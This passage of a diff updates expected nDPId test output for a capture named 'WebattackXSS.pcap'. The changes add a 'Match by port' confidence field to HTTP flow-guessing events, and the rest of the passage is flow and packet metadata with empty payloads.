+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347493167,"flow_last_seen":1499347498750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":309,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347493167,"flow_last_seen":1499347498750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57778,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347494446,"flow_last_seen":1499347499749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347494446,"flow_last_seen":1499347499749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5441,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":310,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347494446,"flow_last_seen":1499347499749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618516,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57792,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347618757,"flow_last_seen":1499347618757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347618757,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59124,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5444,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":385,"flow_packet_id":1,"flow_last_seen":1499347618757,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347618757,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UcRAAD4GdAysEAABwKgKMub0AFCevDJ5AAAAAKACchBBkQAAAgQFtAQCCAoBO2O9AAAAAAEDAwc="}
@@ -2184,17 +2184,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":1,"flow_last_seen":1499347627616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347627616,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GbxAAD4GrBSsEAABwKgKMudUAFBilXXYAAAAAKACchAxUgAAAgQFtAQCCAoBO2xkAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":2,"flow_last_seen":1499347627616,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347627616,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ51QwQXQsYpV12aAScSBMBQAAAgQFtAQCCAoD5T3ZATtsZAEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5524,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_packet_id":3,"flow_last_seen":1499347627617,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347627617,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Gb1AAD4GrBusEAABwKgKMudUAFBilXXZMEF0LYAQAOXrDAAAAQEICgE7bGQD5T3Z"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347495714,"flow_last_seen":1499347500750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347495714,"flow_last_seen":1499347500750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":311,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347495714,"flow_last_seen":1499347500750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57806,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347498249,"flow_last_seen":1499347503750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347498249,"flow_last_seen":1499347503750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":312,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347498249,"flow_last_seen":1499347503750,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57832,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347499500,"flow_last_seen":1499347504749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347499500,"flow_last_seen":1499347504749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":313,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347499500,"flow_last_seen":1499347504749,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57846,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347500770,"flow_last_seen":1499347506751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347500770,"flow_last_seen":1499347506751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":314,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347500770,"flow_last_seen":1499347506751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57860,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347503273,"flow_last_seen":1499347508751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347503273,"flow_last_seen":1499347508751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":315,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347503273,"flow_last_seen":1499347508751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57886,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347504529,"flow_last_seen":1499347509751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347504529,"flow_last_seen":1499347509751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5531,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":316,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347504529,"flow_last_seen":1499347509751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347628628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57900,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347630130,"flow_last_seen":1499347630130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347630130,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5543,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_packet_id":1,"flow_last_seen":1499347630130,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347630130,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rFRAAD4GGXysEAABwKgKMuduAFDOysKMAAAAAKACchB12gAAAgQFtAQCCAoBO27YAAAAAAEDAwc="}
@@ -2220,17 +2220,17 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5611,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1499347637687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347637687,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W0xAAD4GaoSsEAABwKgKMufAAFAySC12AAAAAKACchCfvwAAAgQFtAQCCAoBO3Y6AAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5612,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":2,"flow_last_seen":1499347637687,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347637687,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ58BffWshMkgtd6AScSCKawAAAgQFtAQCCAoD5UevATt2OgEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5613,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":3,"flow_last_seen":1499347637688,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347637688,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W01AAD4GaousEAABwKgKMufAAFAySC13X31rIoAQAOUpcwAAAQEICgE7djoD5Uev"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347505774,"flow_last_seen":1499347511753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347505774,"flow_last_seen":1499347511753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":317,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347505774,"flow_last_seen":1499347511753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57914,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347508344,"flow_last_seen":1499347513753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347508344,"flow_last_seen":1499347513753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":318,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347508344,"flow_last_seen":1499347513753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57940,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347509601,"flow_last_seen":1499347514754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347509601,"flow_last_seen":1499347514754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":319,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347509601,"flow_last_seen":1499347514754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57954,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347512081,"flow_last_seen":1499347517753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347512081,"flow_last_seen":1499347517753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":5620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":320,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347512081,"flow_last_seen":1499347517753,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347638707,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":57980,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
